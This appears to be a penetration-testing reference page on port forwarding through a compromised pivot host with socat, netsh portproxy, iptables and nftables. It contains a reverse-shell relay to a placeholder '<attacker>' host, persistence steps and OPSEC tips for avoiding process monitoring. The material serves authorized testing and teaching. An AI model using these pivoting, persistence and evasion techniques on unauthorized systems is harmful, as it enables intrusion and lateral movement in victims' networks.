Native Port Forwarding
#Overview
When SSH is not available, native OS tools provide port forwarding through the pivot host. These tools don't require SSH access — they run directly on the compromised host using built-in OS capabilities.
#socat (Extended)
#Port Relay Patterns
# Simple TCP relay: forward local 8080 to 172.16.0.10:80
socat TCP-LISTEN:8080,fork TCP:172.16.0.10:80
# Bind to specific interface
socat TCP-LISTEN:8080,fork,bind=10.10.10.10 TCP:172.16.0.10:80
# UDP relay
socat UDP-LISTEN:5353,fork UDP:172.16.0.10:53
# IPv6 relay
socat TCP6-LISTEN:8080,fork TCP6:[fd00::10]:80
BASH
#SSL Wrapping
# TLS-wrapped forward (encrypt the tunnel)
socat OPENSSL-LISTEN:8443,fork,cert=server.pem,key=server.key TCP:172.16.0.10:80
# Connect to TLS service through relay
socat TCP-LISTEN:8080,fork OPENSSL:172.16.0.10:443,verify=0
# Mutual TLS
socat OPENSSL-LISTEN:8443,fork,cert=server.pem,key=server.key,cafile=ca.pem OPENSSL:172.16.0.10:443,cafile=ca.pem
BASH
#Protocol Translation
# TCP to Unix socket (for local services)
socat TCP-LISTEN:8080,fork UNIX-CONNECT:/var/run/docker.sock
# TCP to serial (IoT devices)
socat TCP-LISTEN:8080,fork /dev/ttyUSB0,b115200,raw
# IPv4 to IPv6 bridge
socat TCP4-LISTEN:8080,fork TCP6:[fd00::10]:80
BASH
#Reverse Shell Relay
# Pivot acts as relay between attacker and target reverse shell
# On pivot:
socat TCP-LISTEN:4444,fork TCP:<attacker>:4444
# Target reverse shell connects to pivot:4444
# Pivot relays to attacker:4444
BASH
#Windows netsh (Extended)
#Port Proxy (portproxy)
# IPv4 to IPv4
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=172.16.0.10 connectport=80
# IPv4 to IPv6
netsh interface portproxy add v4tov6 listenaddress=0.0.0.0 listenport=8080 connectaddress=fd00::10 connectport=80
# IPv6 to IPv4
netsh interface portproxy add v6tov4 listenaddress=:: listenport=8080 connectaddress=172.16.0.10 connectport=80
# IPv6 to IPv6
netsh interface portproxy add v6tov6 listenaddress=:: listenport=8080 connectaddress=fd00::10 connectport=80
# List all port proxies
netsh interface portproxy show all
# Delete a port proxy
netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8080
CMD
#Persistence
# netsh portproxy rules survive reboots automatically (stored in registry)
# Registry location: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy
# Verify persistence
reg query "HKLM\SYSTEM\CurrentControlSet\Services\PortProxy"
# Firewall rule to allow the forwarded port
netsh advfirewall firewall add rule name="Allow 8080" dir=in action=allow protocol=TCP localport=8080
# Delete firewall rule
netsh advfirewall firewall delete rule name="Allow 8080"
CMD
#Common Issues with netsh
listenaddress=0.0.0.0may not work — try the specific interface IP- Requires the
IP Helperservice to be running - Only TCP (no UDP support in portproxy)
- Changes are persistent — always clean up with
deleteafter the engagement
#iptables NAT (Linux Kernel Forwarding)
iptables NAT rules forward traffic at the kernel level — no user-space process needed. This is the most OPSEC-friendly method on Linux.
#DNAT (Destination NAT) — Port Forward
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# Forward port 8080 to 172.16.0.10:80
iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.16.0.10:80
# If the target needs to reply through this host (same subnet):
iptables -t nat -A POSTROUTING -j MASQUERADE
# Or more specific:
iptables -t nat -A POSTROUTING -d 172.16.0.10 -j MASQUERADE
BASH
#SNAT (Source NAT) — Masquerade
# Full subnet routing through this host
iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o eth1 -j MASQUERADE
# SNAT with specific source IP (when you have a static IP)
iptables -t nat -A POSTROUTING -s 10.10.0.0/24 -o eth1 -j SNAT --to-source 172.16.0.100
BASH
#Forward Specific Host
# Forward all traffic to a specific host (transparent proxy)
iptables -t nat -A PREROUTING -d 10.10.10.10 -j DNAT --to-destination 172.16.0.10
# With port mapping
iptables -t nat -A PREROUTING -d 10.10.10.10 -p tcp --dport 443 -j DNAT --to-destination 172.16.0.10:8443
BASH
#Redirect Local Traffic
# Redirect locally-generated traffic (OUTPUT chain, not PREROUTING)
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 127.0.0.1:8080
# Transparent proxy (redirect all HTTP to local proxy)
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
BASH
#Persistent iptables Rules
# Save rules (Debian/Ubuntu)
apt install iptables-persistent
netfilter-persistent save
# Save rules (RHEL/CentOS)
iptables-save > /etc/iptables/rules.v4
# Restore on boot
iptables-restore < /etc/iptables/rules.v4
# With iptables-persistent (auto-restore):
# Rules saved in /etc/iptables/rules.v4 and rules.v6
BASH
#Cleanup
# List NAT rules
iptables -t nat -L -n -v
# Delete specific rule
iptables -t nat -D PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.16.0.10:80
# Flush all NAT rules
iptables -t nat -F
# Disable IP forwarding
echo 0 > /proc/sys/net/ipv4/ip_forward
BASH
#nftables (Modern Linux)
nftables is replacing iptables on modern Linux distributions.
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# DNAT: forward port 8080 to 172.16.0.10:80
nft add rule ip nat prerouting tcp dport 8080 dnat to 172.16.0.10:80
# MASQUERADE
nft add rule ip nat postrouting oifname "eth1" masquerade
# List rules
nft list ruleset
# Delete all rules
nft flush ruleset
BASH
#Common Pitfalls
- IP forwarding disabled:
iptablesDNAT requiresip_forward=1. Without it, forwarded packets are dropped. - Return path broken: If the target can route directly back to the source (same subnet), it won't send replies through the pivot. Use MASQUERADE or SNAT.
- netsh requires IP Helper: On Windows, the
IP Helperservice must be running for portproxy to work. - socat process visibility: socat creates a user-space process visible in
psoutput. iptables does not. - nftables vs iptables: Some modern distros use nftables backend with iptables syntax. Check with
iptables --version.
#OPSEC Considerations
- iptables NAT rules are kernel-level — no process to detect in
ps - iptables rules persist across reboots with
iptables-persistent - netsh portproxy rules are stored in the Windows registry and survive reboots
- socat processes are visible and may be flagged by process monitoring
- Always clean up iptables/netsh rules after the engagement
#Cross-References
- SSH Port Forwarding — SSH-based port forwarding
- Metasploit Routing — Metasploit autoroute and portfwd
- Network Enumeration — Discover targets to forward to